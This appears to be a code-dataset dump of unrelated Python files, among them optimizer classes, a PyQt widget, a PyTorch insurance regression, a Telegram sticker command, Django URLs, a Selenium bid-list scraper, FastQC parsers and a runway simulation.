calc_ada(self, diff):\n return self.attn * self.last_ada + (1 - self.attn) * diff ** 2\n def calc(self, diff):\n ada = self.calc_ada(diff)\n self.last_ada = ada\n self.last_learn = diff / np.sqrt(self.epsilon + ada)\n\nclass Adagrad(RMSProp):\n def calc_ada(self, diff):\n return self.last_ada + diff * diff\n def calc(self, diff):\n ada = self.calc_ada(diff)\n self.last_ada = ada\n self.last_learn = diff / (self.epsilon + np.sqrt(ada))\n\n#初期学習率がいらない\nclass AdaDelta(RMSProp):\n def __init__(self,\n **kwargs,\n ):\n super(AdaDelta, self).__init__(**kwargs)\n self.diff_mean = 0\n def calc(self, diff):\n ada = self.calc_ada(diff)\n update_diff = -diff * np.sqrt(self.epsilon + self.diff_mean) / np.sqrt(self.epsilon + ada)\n self.last_ada = ada\n self.last_learn = update_diff\n def update(self):\n self.diff_mean = self.attn * self.diff_mean + (1 - self.attn) * (self.last_learn ** 2)\n return self.clip(self.last_learn)\nclass Adam(RMSProp):\n def __init__(self,\n *,\n learn_rate = 0.125,\n epsilon = 0.1,\n attenuation_rate = 0.9, #減衰率\n **kwargs,\n ):\n super(Adam, self).__init__(**kwargs)\n self.learn_rate = learn_rate\n self.moment_first = 0\n self.moment_second = 0\n self.attn = attenuation_rate or 0.9\n self.attn_multipled = self.attn\n self.epsilon = epsilon or 0.1 #どれぐらいがいいのかさっぱりわからん\n def calc(self, diff):\n mom_1 = self.attn * self.moment_first + (1 - self.attn) * diff\n mom_2 = self.attn * self.moment_second + (1 - self.attn) * diff * diff\n self.moment_first = mom_1\n self.moment_second = mom_2\n def update(self):\n molec = self.moment_first / (1 - self.attn_multipled)\n denomi = np.clip(self.moment_second / (1 - self.attn_multipled), 1e-7, None)\n self.attn_multipled *= self.attn\n return self.clip(-self.learn_rate * molec / denomi)\n\n# 大文字シータを順伝播させた場合の勾配を求めるやり方が���からない\n# class NesterovAcceleratedGradient(Plain):\n# #rateはモーメンタム係数momentum coefficientのことだが名前が長すぎるので\n# def __init__(self, *, rate = None):\n# self.learn_stack = []\n# self.last_moment = None\n# self.rate = rate or 0.05\n# def update(self, layer):\n# last_upd = self.last_upd \n# upd = -layer.learn_rate * np.sum(np.array(self.learn_stack), axis = 0)\n# moment = self.last_moment if self.last_moment is not None else 0\n# alpha = len(self.learn_stack) * self.rate * moment\n# theta = layer.weight + self.last_moment\n# self.last_moment = self.rate * (self.last_moment + self.last_upd) + self.last_upd - self.last_moment\n# self.last_upd = upd\n# self.learn_stack = []\n# return self.last_moment\n","sub_path":"update_strategy.py","file_name":"update_strategy.py","file_ext":"py","file_size_in_byte":5510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"77115705","text":"'''\nCreated on Feb 24, 2012\n\n@author: zimp\n'''\n\nfrom PyQt4 import QtGui, QtCore\n\nclass AvailableShapesWidget(QtGui.QWidget):\n '''\n Handles and displays shapes by placing them one after another in a\n grid-like layout. Wraps shapes to fit the width of the widget and expands\n as necessary downwards with a scrollbar. Inherits from QtGui.QWidget.\n '''\n\n\n def __init__(self):\n '''\n Initialize an instance. Inherits QtGui.QWidget.\n '''\n super(AvailableShapesWidget, self).__init__()\n self.available_shapes = []\n self.init_ui()\n \n def init_ui(self):\n '''\n Helper function for __init__. Sets minimum width of widget to be 100.\n '''\n self.setMinimumWidth(100)\n \n def paintEvent(self, e):\n '''\n Paint the shapes in a list in a grid-like layout. Wraps shapes to next\n line if they take up too much space and expands downwards with a\n scrollbar.\n '''\n qp = QtGui.QPainter()\n qp.begin(self)\n qp.setRenderHint(QtGui.QPainter.Antialiasing, True)\n qp.setPen(QtGui.QColor(30, 30, 30))\n qp.setBrush(QtGui.QColor(240, 240, 240))\n spacer = 10\n widthlimit = max(400, self.width()) \n curx = 0\n cury = 0\n hmaxonrow = 0\n wmax = 0\n for shape in self.available_shapes:\n w = shape.get_max_width()\n if curx + w <= widthlimit:\n shape.draw_at_position(qp, curx, cury)\n curx += w + spacer\n else:\n wmax = max(curx, wmax)\n curx = 0\n cury += spacer + hmaxonrow\n shape.draw_at_position(qp, curx, cury)\n curx = w + spacer\n hmaxonrow = max(hmaxonrow, shape.get_max_height())\n wmax = max(curx, wmax)\n if wmax < 400:\n self.setMinimumWidth(max(100, wmax))\n else:\n self.setMinimumWidth(400)\n self.setMinimumHeight(cury + hmaxonrow)\n qp.end()\n \n def refresh(self, available_shapes):\n '''\n Set the list of shapes to be drawn to available_shapes and call\n self.repaint to update view.\n\n @param available_shapes: list of shapes to draw.\n @type available_shapes: list\n '''\n self.available_shapes = available_shapes\n self.repaint()\n","sub_path":"src/availableshapeswidget.py","file_name":"availableshapeswidget.py","file_ext":"py","file_size_in_byte":2386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"595305506","text":"import torch\nimport torchvision\nimport torch.nn as nn\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport torch.nn.functional as F\nfrom torchvision.datasets.utils import download_url\nfrom torch.utils.data import DataLoader, TensorDataset, random_split\n\n\ndataset_url = \"https://hub.jovian.ml/wp-content/uploads/2020/05/insurance.csv\"\ndata_filename = r\"C:\\\\Users\\\\usuario\\Documents\\\\PROGRMACIÓN\\\\archivosCSV\\\\insurance.csv\"\n#download_url(dataset_url,'.')\ndataframe = pd.read_csv(data_filename,sep=',')\n\nmy_name = \"matilde\"\n\n\ndef customize_dataset(dataframe_raw, rand_str): #Me pone lindo para ver los datos\n dataframe = dataframe_raw.copy(deep=True)\n # drop some rows\n dataframe = dataframe.sample(int(0.95*len(dataframe)), random_state=int(ord(rand_str[0])))\n # scale input\n dataframe.bmi = dataframe.bmi * ord(rand_str[1])/100.\n # scale target\n dataframe.charges = dataframe.charges * ord(rand_str[2])/100.\n # drop column\n if ord(rand_str[3]) % 2 == 1:\n dataframe = dataframe.drop(['region'], axis=1)\n return dataframe\n\n\n#dataframe=customize_dataset(dataframe_raw, my_name)\nnum_rows=1338\nnum_columns = 7\ninput_cols = ['age', 'sex', 'bmi', 'children', 'smoker','region','charges']\ncategorical_cols=['sex','smoker','region']\noutput_cols = ['bmi','charges']\n\ndef dataframe_to_arrays(dataframe):\n # Make a copy of the original dataframe\n dataframe1 = dataframe.copy(deep=True)\n # Convert non-numeric categorical columns to numbers\n for col in categorical_cols:\n dataframe1[col] = dataframe1[col].astype('category').cat.codes\n # Extract input & outupts as numpy arrays\n inputs_array = dataframe1[input_cols].to_numpy()\n targets_array = dataframe1[output_cols].to_numpy()\n return inputs_array, targets_array\n\ninputs_array, targets_arrays = dataframe_to_arrays(dataframe)\n# pylint: disable=E1101\ninputs = torch.from_numpy(inputs_array)\ntargets = torch.from_numpy(targets_arrays)\ninputs, targets =inputs.float(), targets.float()\n# pylint: enable=E1101\ntargets = targets.squeeze (dim=1)\n\ndataset = TensorDataset (inputs, targets)\nval_percent = 0.15\nval_size = int(num_rows * val_percent)\ntrain_size = int(num_rows-val_size)\ntrain_ds, val_ds = random_split (dataset, [train_size, val_size])\n\n\nbatch_size = 32\ntrain_loader =DataLoader(train_ds,batch_size, shuffle = True)\nval_loader = DataLoader(val_ds, batch_size, shuffle =True)\n\n\ninput_size = len(input_cols)\noutput_size = len (output_cols)\n\n\nclass InsuranceModel (nn.Module):\n def __init__(self):\n super().__init__()\n self.linear = nn.Linear(input_size, output_size)\n def forward(self ,xb):\n out = self.linear(xb)\n return out\n def training_step (self, batch):\n inputs, targets = batch\n out = self (inputs)\n loss=F.kl_div(out, targets)\n return loss\n def validation_step (self, batch):\n inputs, targets = batch\n out = self (inputs)\n loss= F.kl_div(out, targets)\n return {'val_loss': loss.detach()}\n def validation_epoch_end(self, outputs):\n batch_losses = [x['val_loss'] for x in outputs]\n # pylint: disable=E1101\n epoch_loss = torch.stack(batch_losses).mean() # Combine losses\n # pylint: enable=E1101\n return {'val_loss': epoch_loss.item()}\n def epoch_end(self, epoch, result, num_epochs):\n # Print result every 20th epoch\n if (epoch+1) % 20 == 0 or epoch == num_epochs-1:\n print(\"Epoch [{}], val_loss: {:.4f}\".format(epoch+1, result['val_loss']))\n\nmodel = InsuranceModel()\n\ndef evaluate (model, val_loader):\n outputs = [model.validation_step(batch) for batch in val_loader]\n return model.validation_epoch_end(outputs)\ndef fit (epochs, lr, model, train_loader, val_loader, opt_func = torch.optim.SGD):\n history = []\n optimizer = opt_func(model.parameters(), lr)\n for epoch in range (epochs):\n for batch in train_loader:\n loss = model.training_step(batch)\n loss.backward()\n optimizer.step()\n optimizer.zero_grad()\n result = evaluate (model, val_loader)\n model.epoch_end(epoch, result, epochs)\n history.append (result)\n return history\n\nresult0 = evaluate(model, val_loader)\nprint('result0: ', result0)\n\nepochs= 5\nlr = 0.001\n#history1 = fit (epochs, lr, model, train_loader, val_loader)\n\nepochs= 35\nlr = 0.00001\n#history2 = fit (epochs, lr, model, train_loader, val_loader)\n\nmodel = InsuranceModel()\n\nepochs= 500\nlr = 0.0001\nhistory3 = fit (epochs, lr, model, train_loader, val_loader)\n\nepochs= 7000\nlr = 0.001\n#history4 = fit (epochs, lr, model, train_loader, val_loader)\n\nepochs= 800\nlr = 1e-6\n#history5 = fit (epochs, lr, model, train_loader, val_loader)\n\ndef predict_single(input, target, model):\n inputs = input.unsqueeze(0)\n predictions = model(inputs)\n prediction = predictions[0].detach()\n print(\"Input:\", input)\n print(\"Target:\", target)\n print(\"Prediction:\", prediction)\n\ninput, target = val_ds[10]\npredict_single(input, target, model)\n\n\n\n\n","sub_path":"codigos/tareas/insurance linear/insurance_linear_mse.py","file_name":"insurance_linear_mse.py","file_ext":"py","file_size_in_byte":5037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"635820223","text":"class Solution:\n def rotate(self, nums: List[int], k: int) -> None:\n \"\"\"\n Do not return anything, modify nums in-place instead.\n O(t):O(N), O(s):O(1)\n \"\"\"\n def reverse(nums, start, end):\n while start < end:\n nums[start], nums[end] = nums[end], nums[start]\n start += 1\n end -= 1\n return\n\n k %= len(nums) # 当 k 比 length of nums 大时, nums会旋转一周接着旋转\n reverse(nums, 0, len(nums)-1)\n reverse(nums, 0, k-1)\n reverse(nums, k, len(nums)-1)\n return","sub_path":"Array_LinkedList/2 旋转数组.py","file_name":"2 旋转数组.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"274204285","text":"from config import bot\nfrom modules.quotes_api import QuotesApi\nfrom PIL import Image\nfrom modules import pillow_helper\nfrom aiogram import exceptions as tg_excs\nfrom aiogram.types import Message\nfrom ..core import Command\n\n\nclass Q(Command):\n \"\"\"\n get a sticker with the message which you are replying to\n \"\"\"\n def __init__(self):\n super().__init__()\n\n @classmethod\n async def execute(cls, m: Message):\n await bot.send_chat_action(m.chat.id, 'upload_photo')\n if m.reply_to_message and m.reply_to_message.caption:\n m.reply_to_message.text = m.reply_to_message.caption\n if m.reply_to_message and not m.reply_to_message.text:\n await bot.send_message(m.chat.id, 'Сообщение должно быть текстовым')\n return\n msg = m.reply_to_message or m\n if msg.forward_from and msg.forward_from.id:\n sender = msg.forward_from\n sender_id = sender.id\n sender_title = f'{sender.first_name} {sender.last_name}' if sender.last_name else sender.first_name\n sender_pic = await bot.get_user_profile_photos(sender.id, limit=1)\n elif msg.forward_sender_name:\n sender_id = None\n sender_title = msg.forward_sender_name\n sender_pic = None\n else:\n sender = msg.from_user\n sender_id = sender.id\n sender_title = f'{sender.first_name} {sender.last_name}' if sender.last_name else sender.first_name\n sender_pic = await bot.get_user_profile_photos(sender.id, limit=1)\n\n if sender_pic and len(sender_pic.photos) > 0:\n sender_pic = sender_pic.photos[0][-1].file_id\n sender_pic = await bot.get_file(sender_pic)\n sender_pic = bot.get_file_url(sender_pic.file_path)\n\n text = m.reply_to_message.text if m.reply_to_message else m.text\n\n quote_png = QuotesApi().get_png(text, sender_title, sender_id=sender_id, profile_picture=sender_pic)\n quote_png.save()\n with Image.open(quote_png.file_name) as img:\n size = pillow_helper.get_size_by_one_side(img, 512)\n edited_pic = img.resize(size)\n edited_file_name = 'edited_' + quote_png.file_name\n edited_pic.save(edited_file_name)\n try:\n with open(edited_file_name, 'rb') as f:\n await bot.send_document(m.chat.id, f)\n except tg_excs.WrongFileIdentifier:\n await bot.send_message(m.chat.id, 'Произошла ошибка, извините.')\n","sub_path":"bot/user_commands/q.py","file_name":"q.py","file_ext":"py","file_size_in_byte":2558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"580789317","text":"from django.conf.urls import patterns, url\nfrom planner import views\n\nurlpatterns = patterns(\n # application urls:\n '',\n url(r'^$', views.IndexView.as_view(), name='index'),\n url(r'^register/$', views.RegisterView.as_view(), name='register'),\n # Example use: login/?next=/register will redirect after logging user in\n url(r'^login/$', views.user_login, name='login'),\n # Example use: logout/?next=/register will redirect after logging user out\n url(r'^logout/$', 'django.contrib.auth.views.logout', {'next_page': '/'}, name='logout'),\n url(r'^plan-absence/$', views.PlanAbsenceView.as_view(), name='plan-absence'),\n url(r'^manage-absences/$', views.ManageAbsenceView.as_view(),\n {'mode': 'manager'}, name='manage-absences'),\n url(r'^my-absences/$', views.ManageAbsenceView.as_view(),\n {'mode': 'selfcare'}, name='my-absences'),\n url(r'^save_weekends/$', views.SaveWeekendsView, name='save_weekends'),\n # urls for ajax calls (returning jsons):\n url(r'^user/$', views.UserRestView.as_view(), name='user'),\n url(r'^teams/$', views.TeamRestView.as_view(), name='teams'),\n url(r'^range/$', views.RangeRestView.as_view(), name='range'),\n url(r'^holiday/$', views.HolidayRestView.as_view(), name='holiday'),\n url(r'^absence/$', views.AbsenceRestView.as_view(), name='absence'),\n)\n\n","sub_path":"planner/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"388692317","text":"import pandas as pd\nfrom selenium import webdriver\nfrom collections import OrderedDict\n\nurl=\"https://bidplus.gem.gov.in/bidlists\"\n\ndriver=webdriver.Chrome(\"D:\\Padhai\\Softwares\\chromedriver.exe\")\n\ndriver.get(url)\n\nbid_no=[]\nitems=[]\nquantity=[]\ndept=[]\nstart=[]\nend=[]\n\n\nfor i in range(1,11): # find by using x path\n bid_no.append(driver.find_element_by_xpath('//*[@id=\"pagi_content\"]/div['+str(i)+']/div[1]/p[1]/a').text)\n items.append(driver.find_element_by_xpath('//*[@id=\"pagi_content\"]/div['+str(i)+']/div[2]/p[1]/span').text)\n quantity.append(driver.find_element_by_xpath('//*[@id=\"pagi_content\"]/div['+str(i)+']/div[2]/p[2]/span').text)\n dept.append(driver.find_element_by_xpath('//*[@id=\"pagi_content\"]/div['+str(i)+']/div[3]/p[2]').text)\n start.append(driver.find_element_by_xpath('//*[@id=\"pagi_content\"]/div['+str(i)+']/div[4]/p[1]/span').text)\n end.append(driver.find_element_by_xpath('//*[@id=\"pagi_content\"]/div['+str(i)+']/div[4]/p[2]/span').text)\n \nstart_date=[]\nstart_time=[]\nend_date=[]\nend_time=[]\n\nfor item in start:\n start_date.append(item.split()[0])\n start_time.append(item.split()[1] + item.split()[2])\nfor item in end:\n end_date.append(item.split()[0])\n end_time.append(item.split()[1] + item.split()[2]) \n\ncol_name=[\"Bid No\",\"Items\",\"Quantity Required\",\"Dept., Name, Address\",\"Start Date\",\"Start Time\",\"End Date\", \"End Time\"]\ncol_data=OrderedDict(zip(col_name,[bid_no,items,quantity,dept,start_date,start_time,end_date,end_time]))\n\ndf = pd.DataFrame(col_data) \ndf.to_csv(\"bid_plus.csv\")","sub_path":"Day 8/bid_plus.py","file_name":"bid_plus.py","file_ext":"py","file_size_in_byte":1538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"295700481","text":"\"\"\"Background\nThere is a message that is circulating via public media that claims a reader can easily read a message where the inner\nletters of each words is scrambled, as long as the first and last letters remain the same and the word contains all the\nletters.\n\nAnother example shows that it is quite difficult to read the text where all the letters are reversed rather than\nscrambled.\n\nIn this kata we will make a generator that generates text in a similar pattern, but instead of scrambled or reversed,\nours will be sorted alphabetically\n\nRequirement\nreturn a string where:\n1) the first and last characters remain in original place for each word\n2) characters between the first and last characters must be sorted alphabetically\n3) punctuation should remain at the same place as it started, for example: shan't -> sahn't\n\nAssumptions\n1) words are seperated by single spaces\n2) only spaces separate words, special characters do not, for example: tik-tak -> tai-ktk\n3) special characters do not take the position of the non special characters, for example: -dcba -> -dbca\n4) for this kata puctuation is limited to 4 characters: hyphen(-), apostrophe('), comma(,) and period(.)\n5) ignore capitalisation\n\n\"\"\"\n\n\nimport re\n\n\ndef scramble_words(words):\n\n special = ['-', '.', ',', '\\'']\n result = []\n\n for word in words.split(' '):\n\n special_index = dict([(k,v) for k,v in enumerate(word) if v in special])\n word = re.sub('[,\\'.-]', '', word)\n\n sorted_word = [word[0]] + sorted(word[1:-1]) + [word[-1]] if len(word) > 2 else [word]\n\n for k,v in special_index.items():\n sorted_word.insert(k, v)\n\n result.append(''.join(sorted_word))\n\n return ' '.join(result)\n\n\n\n","sub_path":"Kata/5kyu Typoglycemia Generator.py","file_name":"5kyu Typoglycemia Generator.py","file_ext":"py","file_size_in_byte":1714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"545304947","text":"# -*- coding: utf-8 -*-\n# 有个目录,里面是你自己写过的程序,统计一下你写过多少行代码。包括空行和注释,但是要分别列出来。\n# 思路:https://www.cnblogs.com/chen0427/p/5732245.html\n\nimport glob\nimport os\nimport re\nfrom PIL import Image\n\n\ndef getFiles(dir):\n return glob.glob(os.path.join(dir, '*.py'))\n\n\ndef sourceStat(filename):\n d = {'totalline':0,'blankline':0,'commentline':0,'codeline':0}\n with open(filename, 'r', encoding='utf-8') as f:\n # readlines会自动去掉文末的一行空行\n lines = list(map(lambda x: x.rstrip('\\n').strip(), f.readlines()))\n flag_comment = False\n for line in lines:\n if line.startswith(\"'''\") or line.startswith('\"\"\"'):\n flag_comment = not flag_comment\n if not flag_comment and not line.startswith(\"'''\") and not line.startswith('\"\"\"'):\n if not line:\n d['blankline'] += 1\n continue\n if line.startswith('#'):\n d['commentline'] += 1\n continue\n # 既非三引号注释行,又非空白行,也不是#号注释行,排除后剩下就是代码行\n d['codeline'] += 1\n else:\n d['commentline'] += 1\n\n d['totalline'] = d['blankline']+d['commentline']+d['codeline']\n return d\n\n\nif __name__ == \"__main__\":\n # dir = r'D:\\Program Files\\Python\\Python37\\Lib\\site-packages\\PIL'\n dir = r'.\\code'\n d_sum={'totalline':0,'blankline':0,'commentline':0,'codeline':0}\n for filename in getFiles(dir):\n file=os.path.basename(filename)\n d=sourceStat(filename)\n print('{0}文件的总行数为:{1},空白行数:{2},注释行数:{3},代码行数:{4}'.format(file,d['totalline'],d['blankline'],d['commentline'],d['codeline']))\n d_sum['totalline'] += d['totalline']\n d_sum['blankline'] += d['blankline']\n d_sum['commentline'] += d['commentline']\n d_sum['codeline'] += d['codeline']\n print('所有文件的总行数为:{0},空白行数:{1},注释行数:{2},代码行数:{3}'.format(d_sum['totalline'],d_sum['blankline'],d_sum['commentline'],d_sum['codeline']))\n","sub_path":"answer/0007/0007.py","file_name":"0007.py","file_ext":"py","file_size_in_byte":2239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"198790568","text":"'''\nCreated on Feb 10, 2013\n\n@author: mkiyer\n'''\nfrom base import SANGER_FORMAT, SOLEXA_FORMAT, ILLUMINA_FORMAT\n\n# FASTQC constants\nSANGER_ENCODING = \"Sanger / Illumina 1.9\"\nSOLEXA_ENCODING = \"Illumina < 1.3\"\nILLUMINA_13_ENCODING = \"Illumina 1.3\"\nILLUMINA_15_ENCODING = \"Illumina 1.5\"\nENCODING_VALUES = (SANGER_ENCODING, \n SOLEXA_ENCODING, \n ILLUMINA_13_ENCODING, \n ILLUMINA_15_ENCODING)\nENCODING_TO_QUAL_FORMAT = {SANGER_ENCODING: SANGER_FORMAT,\n SOLEXA_ENCODING: SOLEXA_FORMAT,\n ILLUMINA_13_ENCODING: ILLUMINA_FORMAT,\n ILLUMINA_15_ENCODING: ILLUMINA_FORMAT}\n\ndef get_most_common_sequence_length(fastqc_data_file):\n fileh = open(fastqc_data_file)\n for line in fileh:\n if line.startswith(\">>Sequence Length Distribution\"):\n break\n fileh.next()\n most_common_length = None\n most_common_count = 0\n for line in fileh:\n if line.startswith(\"#\"):\n continue\n if line.startswith(\">>END_MODULE\"):\n break\n fields = line.strip().split('\\t')\n length = fields[0]\n count = float(fields[1])\n if (count >= most_common_count):\n most_common_length = length\n most_common_count = count\n fileh.close()\n lengths = map(int, most_common_length.split('-'))\n return int(round(float(sum(lengths)) / len(lengths)))\n\ndef get_sequence_length(fastqc_data_file):\n for line in open(fastqc_data_file):\n if not line: continue\n line = line.strip()\n if line.startswith(\"Sequence length\"):\n return int(line.split()[-1])\n\ndef get_total_sequences(fastqc_data_file):\n for line in open(fastqc_data_file):\n if not line: continue\n line = line.strip()\n if line.startswith(\"Total Sequences\"):\n return int(line.split()[-1])\n\ndef get_encoding(fastqc_data_file):\n for line in open(fastqc_data_file):\n if not line: continue\n line = line.strip()\n if line.startswith(\"Encoding\"):\n return line.split(\"\\t\")[-1]","sub_path":"oncoseq/rnaseq/lib/fastqc.py","file_name":"fastqc.py","file_ext":"py","file_size_in_byte":2123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"216708061","text":"import re\r\nimport operator\r\nimport os\r\nimport sys \r\nfrom PyQt4.QtCore import * \r\nfrom PyQt4.QtGui import *\r\nimport sys\r\nfrom random import randint\r\nfrom Plane import Plane\r\nimport time\r\n#from queue import PriorityQueue\r\nimport ModelImpl \r\nimport re\r\nimport operator\r\nimport os\r\nimport sys \r\nfrom PyQt4 import QtCore\r\nfrom PyQt4.QtCore import QObject, pyqtSignal\r\nfrom radar import Ui_RadarWidget\r\nlist_of_names = ['Burkina Air', 'TAROM', 'MoldAir', 'Aeroflot']\r\n\r\nclass Simulation(QObject):\r\n\t\r\n\ttick=4*[QtCore.pyqtSignal(int, name=\"changed\")]\r\n\theader = ['Nume', 'Prioritate']\r\n\tdef __init__(self, maxNumber, timerTick, numPiste):\r\n\t\tsuper(Simulation, self).__init__()\r\n\t\tself.running = 0\r\n\t\tself.currentNumber = 0\r\n\t\tself.maxNumber = maxNumber\r\n\t\tself.timerTick = timerTick\r\n\t\tself.listOfAirplanes = numPiste * [None]\r\n\t\tself.numPiste = numPiste\r\n\t\tself.sosiriIn = []\r\n\t\tself.plecariIn = []\r\n\t\tself.plecariModel = None\r\n\t\tself.sosiriModel = None\r\n\t\tself.__generateInitialData(self.maxNumber)\r\n\t\tself.ui = None\r\n\t\t\r\n\tdef __generateInitialData(self, nr):\r\n\t\ttoGenerate = randint(0, nr)\r\n\t\tself.currentNumber += toGenerate\r\n\t\tif self.plecariModel is not None:\r\n\t\t\tself.plecariModel.triggerDataChanging()\r\n\t\t\tself.sosiriModel.triggerDataChanging()\r\n\t\t\t\r\n\r\n\t\tfor i in range(1, toGenerate):\r\n\t\t\tplane = Plane.generateRandomPlane()\r\n\t\t\tif plane.status == 0:\r\n\t\t\t\tself.plecariIn.append(plane)\r\n\t\t\telse:\r\n\t\t\t\tself.sosiriIn.append(plane)\r\n\t\tself.plecariIn.sort()\r\n\t\tself.sosiriIn.sort()\r\n\t\tif self.plecariModel is not None:\r\n\t\t\tself.plecariModel.triggerDataChanged()\r\n\t\t\tself.sosiriModel.triggerDataChanged()\r\n\t\t\r\n\t\t\r\n\tdef __bindUiToModel(self):\r\n\t\tif self.ui is not None:\r\n\t\t\tfor i in range(self.numPiste):\r\n\t\t\t\tairplane = self.listOfAirplanes[i]\r\n\t\t\t\tif airplane is not None:\r\n\t\t\t\t\tgetattr(self.ui, 'runway' + str(i)).setValue(int(airplane.getPercentage() * 100))\r\n\t\t\t\telse:\r\n\t\t\t\t\tgetattr(self.ui, 'runway' + str(i)).setValue(0)\r\n\t\t\tself.ui.labelSosiri.setText(self.ui.labelSosiri.text() + ' ' + str(len(self.sosiriIn)))\r\n\t\t\tself.ui.labelPlecari.setText(self.ui.labelPlecari.text() + ' ' + str(len(self.plecariIn)))\r\n\r\n\tdef setGraphicalModel(self, ui):\r\n\t\tself.ui = ui\r\n\t\tself.plecariModel = MyTableModel(self.plecariIn, Simulation.header,['name', 'priority'], ui.tabelPlecari) \r\n\t\tself.sosiriModel = MyTableModel(self.sosiriIn, Simulation.header,['name', 'priority'], ui.tabelSosiri) \r\n\t\tui.tabelPlecari.setModel(self.plecariModel)\r\n\t\tui.tabelSosiri.setModel(self.sosiriModel)\r\n#\t\tfor i in range(self.numPiste):\r\n#\t\t\ttick[i].connect(getattr(self.ui, 'runway' + str(i)).setValue)\r\n\t\tself.__bindUiToModel()\r\n\t\tself.ui.buttonStart.clicked.connect(self.setRunning)\r\n\t\tself.ui.buttonStop.clicked.connect(self.setStopped)\r\n\tdef setStopped(self):\r\n\t\tself.running = 2\r\n\tdef setRunning(self):\r\n\t\tself.running = 1\r\n\tdef startInit(self):\r\n\t\tself.running = 2\r\n\t\tself.__runSimulation()\r\n\tdef __consumePlane(self):\r\n\t\tfreeSpots = [x for x in self.listOfAirplanes if x is None]\r\n\t\tif len(freeSpots) > 0:\r\n\t\t\tindex = self.listOfAirplanes.index(None)\r\n\t\telse:\r\n\t\t\treturn\r\n\t\tprint('Free spot at ' + str(index))\r\n\t\tif len(self.plecariIn) > 0:\r\n\t\t\tdepPlane = self.plecariIn[0]\r\n\t\telse:\r\n\t\t\tdepPlane = None\r\n\t\tif len(self.sosiriIn) > 0:\r\n\t\t\tarrPlane = self.sosiriIn[0]\r\n\t\telse:\r\n\t\t\tarrPlane = None\r\n\t\tif (arrPlane is None and depPlane is None):\r\n\t\t\treturn\r\n\t\tif arrPlane is None or (depPlane is not None and depPlane.priority < arrPlane.priority):\r\n\t\t\tself.listOfAirplanes[index] = depPlane\r\n\t\t\tself.plecariIn.pop(0)\r\n\t\telif depPlane is None or (arrPlane is not None and depPlane.priority > arrPlane.priority):\r\n\t\t\tself.listOfAirplanes[index] = arrPlane\r\n\t\t\tself.sosiriIn.pop(0)\r\n\t\telse:\r\n\t\t\tif len(self.sosiriIn) > len(self.plecariIn):\r\n\t\t\t\tself.listOfAirplanes[index] = arrPlane\r\n\t\t\t\tself.sosiriIn.pop(0)\r\n\t\t\t\tprint(str(arrPlane) + ' departing from ' + str(index))\r\n\t\t\telse:\r\n\t\t\t\tself.listOfAirplanes[index] = arrPlane\r\n\t\t\t\tself.plecariIn.pop(0)\r\n\t\t\t\tprint(str(arrPlane) + ' arriving on ' + str(index))\r\n\tdef __checkForCompletion(self):\r\n\t\tfor i in range(0, len(self.listOfAirplanes)):\r\n\t\t\tif self.listOfAirplanes[i] is not None:\r\n\t\t\t\tif self.listOfAirplanes[i].status == 0:\r\n\t\t\t\t\tself.listOfAirplanes[i].landingTime-=1\r\n\t\t\t\telse:\r\n\t\t\t\t\tself.listOfAirplanes[i].takeOffTime-=1\r\n\t\t\t\tif self.listOfAirplanes[i].takeOffTime <= 0 or self.listOfAirplanes[i].landingTime<=0:\r\n\t\t\t\t\tprint(str(self.listOfAirplanes[i]) + ' over for rw ' + str(i))\r\n\t\t\t\t\tself.listOfAirplanes[i] = None\r\n\t\t\t\t\t\r\n\tdef __runSimulation(self):\r\n\t\twhile self.running != 0:\r\n\t\t\tif self.running == 2:\r\n\t\t\t\tcontinue\r\n\t\t\tif (self.currentNumber < self.maxNumber):\r\n\t\t\t\tself.__generateInitialData(self.maxNumber - self.currentNumber)\r\n\t\t\tself.__checkForCompletion()\r\n\t\t\tself.__consumePlane()\r\n\t\t\tself.__printModel()\r\n\t\t\ttime.sleep(self.timerTick)\r\n\tdef stopInit(self):\r\n\t\tself.running = 0\r\n\tdef __printModel(self):\r\n\t\tfor i in range(0, len(self.listOfAirplanes)):\r\n\t\t\tif self.listOfAirplanes[i] is not None:\r\n\t\t\t\tprint ('RW:' + str(i) + ' --- ' + self.listOfAirplanes[i].name + ' --- ' + str(int(self.listOfAirplanes[i].getPercentage() * 100)) + '%')\r\n\t\t\telse:\r\n\t\t\t\tprint ('RW:' + str(i) + ' --- is free')\r\n\r\n","sub_path":"Simulation.py","file_name":"Simulation.py","file_ext":"py","file_size_in_byte":5146,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"436323917","text":"# Copyright (C) 2008 One Laptop Per Child\n# Copyright (C) 2010 Sugar Labs\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA\n\nimport logging\nimport math\nimport hashlib\nfrom gettext import gettext as _\n\nimport gobject\nimport gtk\nimport hippo\n\nfrom sugar.graphics import style\n\nfrom jarabe.model import bundleregistry\nfrom jarabe.desktop.grid import Grid\n\n_logger = logging.getLogger('ActivityLayout')\n\n_ACTIVITY_SCREEN_PERCENTAGE = 35\n\n_CELL_SIZE = 4\n_BASE_SCALE = 